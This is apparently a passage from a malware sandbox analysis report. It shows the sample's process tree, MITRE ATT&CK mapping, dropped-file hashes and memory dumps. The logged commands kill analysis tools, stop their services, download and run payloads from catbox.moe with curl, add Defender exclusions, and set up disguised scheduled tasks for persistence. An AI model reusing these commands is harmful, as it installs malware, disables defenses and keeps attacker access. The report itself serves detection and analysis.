- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2264
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3056
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4848
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:436
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:864
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3176
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:4852
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3092
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3556
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4968
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:972
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:4816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:428
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2392
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3288
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3724
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4228
    - - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:412
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\sysmon.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\uk-UA\fontdrvhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\services.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wininit.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Medal\Medal.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\koDWzADdxB.bat"
        6⤵
        
        PID:2492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2940
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/n2gnyp.bat --output C:\Windows\System32\Tasks\clean1.bat >nul 2>&1
  2⤵
  PID:4844
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/n2gnyp.bat --output C:\Windows\System32\Tasks\clean1.bat
    3⤵
    - Drops file in System32 directory
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/k169rm.bat --output C:\Windows\System32\Tasks\clean2.bat >nul 2>&1
  2⤵
  PID:3636
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/k169rm.bat --output C:\Windows\System32\Tasks\clean2.bat
    3⤵
    - Drops file in System32 directory
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/c7ecn0.bat --output C:\Windows\System32\Tasks\clean3.bat >nul 2>&1
  2⤵
  PID:5000
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/c7ecn0.bat --output C:\Windows\System32\Tasks\clean3.bat
    3⤵
    - Drops file in System32 directory
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/niandj.bat --output C:\Windows\System32\Tasks\clean4.bat >nul 2>&1
  2⤵
  PID:4888
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/niandj.bat --output C:\Windows\System32\Tasks\clean4.bat
    3⤵
    - Drops file in System32 directory
    PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\clean1.bat
  2⤵
  PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2380 -ip 2380
1⤵
PID:936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Videos\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Videos\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Videos\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 13 /tr "'C:\Medal\Medal.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe

Filesize
206B

MD5
4f3f273179a1bd058ed059d322db85fc

SHA1
7eb81ffc4a93e30c4a2733d59acf7870df2103f6

SHA256
5b59e046d311d49f2f4ac613e394b0e3b4a925a6918ed8a9a9420929d2eed70d

SHA512
49a6fe66b7d9df496f57d5d2e66752141e5227072df13b3d3655be982e6a499607e276bf9f27bb16164309166f8116c0cd0481dcd5d8a05fb0ff1cde9c06299d

Download Submit
C:\Medal\Medal.exe

Filesize
1.6MB

MD5
397270342ebff19bad2535390cff49c6

SHA1
482edca85dc4a788acfaf1d1155f95c0e4f5e1f1

SHA256
143e3baeafa9d95f8261d342a8d74fceb1006c92fdabb8642d730ede7429bdaa

SHA512
6492376f333de41d0d7e8a21d32f8d0a10d2f9827948a9fe4fe04ee5bd6b10d3a2bd984c74201c3bfc8bf41347aaf0dc4b2b86dbeff4bfa8e65f7a03e7c9a9ba

Download Submit
C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat

Filesize
76B

MD5
913226ebe160f705613c1d6dc13763ca

SHA1
11519fe4f2769114270377bebe1d944073c68ae9

SHA256
9c8501b6c9e586b9791b7492697c2555a28fec65770e325890047d410fc84941

SHA512
8f45b29bde3794e02a263f07116260a588c478496c892ce4d12b7b8361ae6dac95a1ee0f0d7c7fb81ebdfb7c4d5123ccf18ef5ae9e150be04f65aa22a2d75e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oc0do05n.a1u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\koDWzADdxB.bat

Filesize
160B

MD5
d8a895c7943837ed5072e304531861ad

SHA1
0ef21894055f5b0726f7587ccd3cb43bbd9a5c01

SHA256
435930fd7cf3161a88158268bab735e704c8ddb93186751306bb42e243571cb6

SHA512
c2a57f5c4f0c8fe6054dee389d0d58d099a6b11b51ca6d7e6d61d4e167d8e349628a6edce0e60f91e1397adcaa8aa84cdf918e723126c5412b3b5bbacf5ef0fa

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
446KB

MD5
efd69d9f6037086f0b2e23417b7a1afa

SHA1
ac3c91b7bdcafad357ee578aa6fdbece22cd19ab

SHA256
27ef5c51d945dd64cd17718b01ce72fb352f9fc0a83f1adfd601d1e62b1469b0

SHA512
3bd6d0e1419286ce77c30a30f9e7df7114b5f6b81b75cd703e0293bb391ab7e573a807c267b461e7448a0e3744777b614bfa32b241cb4bc63fe44bf2173bf40f

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
694KB

MD5
1dc5d763d93e66ff1775cfc9d749d82d

SHA1
76f7efc39d4ae890c9d2da577af942f959f0d03f

SHA256
1de1f60c6f5ea26d2f2ebf5447910f156db59d896bbe753c90aa828cd6ef06f1

SHA512
4108d78571bd6df8a4e66ae70e2546a0b2011a3224f29acde1739e5b4ea80fde7450d00759fd479e8cbef75e7d26a840635509bd709a2863c6346dfab3f8e050

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
1.9MB

MD5
45d510cebcdf9aa852297a7303627ab1

SHA1
86605b896ec57d214d5839b2db897ae79be32778

SHA256
fc66c2a511a43c990ca2485814be308f2c65ef61d82124299036b3f8f694e5ee

SHA512
42ea67e8a6aaff3d1daec65f0b9c5e53952f55894fc0ce31259e61ad4ac277d3225d3b9ae142f78ae2d466387a0d92c5ba8059a0b2404d5a200aece40b9cea85

Download Submit
C:\Windows\System32\Tasks\clean1.bat

Filesize
22KB

MD5
691a8da53eac534e67dd0a1afd8d7829

SHA1
fe9754ea0817ab1c3b43c3541ec0b8b5fb551aea

SHA256
6d8474b60f28ee629a8b0eae25cc8c214d2e45c23e64445105389b530b535819

SHA512
667193eee3fceb28c9fdce6017938d87d0666948cee6abe46f36e92055781e30d8e39d3835fcf7d8350f560873065c958e7e0c58aee242f770beade3be27d6f6

Download Submit
memory/412-34-0x0000000000A20000-0x0000000000BCA000-memory.dmp

Filesize
1.7MB

Download
memory/412-36-0x0000000002BA0000-0x0000000002BAE000-memory.dmp

Filesize
56KB

Download
memory/412-38-0x000000001B6D0000-0x000000001B6DC000-memory.dmp

Filesize
48KB

Download
memory/920-132-0x0000021C77DC0000-0x0000021C77F2A000-memory.dmp

Filesize
1.4MB

Download
memory/1224-116-0x000002CD605E0000-0x000002CD6074A000-memory.dmp

Filesize
1.4MB

Download
memory/1560-128-0x00000274EAD50000-0x00000274EAEBA000-memory.dmp

Filesize
1.4MB

Download
memory/1596-123-0x000001F53C690000-0x000001F53C7FA000-memory.dmp

Filesize
1.4MB

Download
memory/2380-4-0x0000000002CB0000-0x0000000002CB6000-memory.dmp

Filesize
24KB

Download
memory/2380-3-0x0000000000960000-0x0000000000A16000-memory.dmp

Filesize
728KB

Download
memory/3268-120-0x000002936CB40000-0x000002936CCAA000-memory.dmp

Filesize
1.4MB

Download
memory/3268-55-0x000002936CA00000-0x000002936CA22000-memory.dmp

Filesize
136KB

Download
memory/3752-129-0x00000257A7850000-0x00000257A79BA000-memory.dmp

Filesize
1.4MB

Download
memory/4536-11-0x0000000000F60000-0x0000000000FBA000-memory.dmp

Filesize
360KB

Download
memory/4536-12-0x0000000000F60000-0x0000000000FBA000-memory.dmp

Filesize
360KB

Download
memory/4536-16-0x0000000000F60000-0x0000000000FBA000-memory.dmp

Filesize
360KB

Download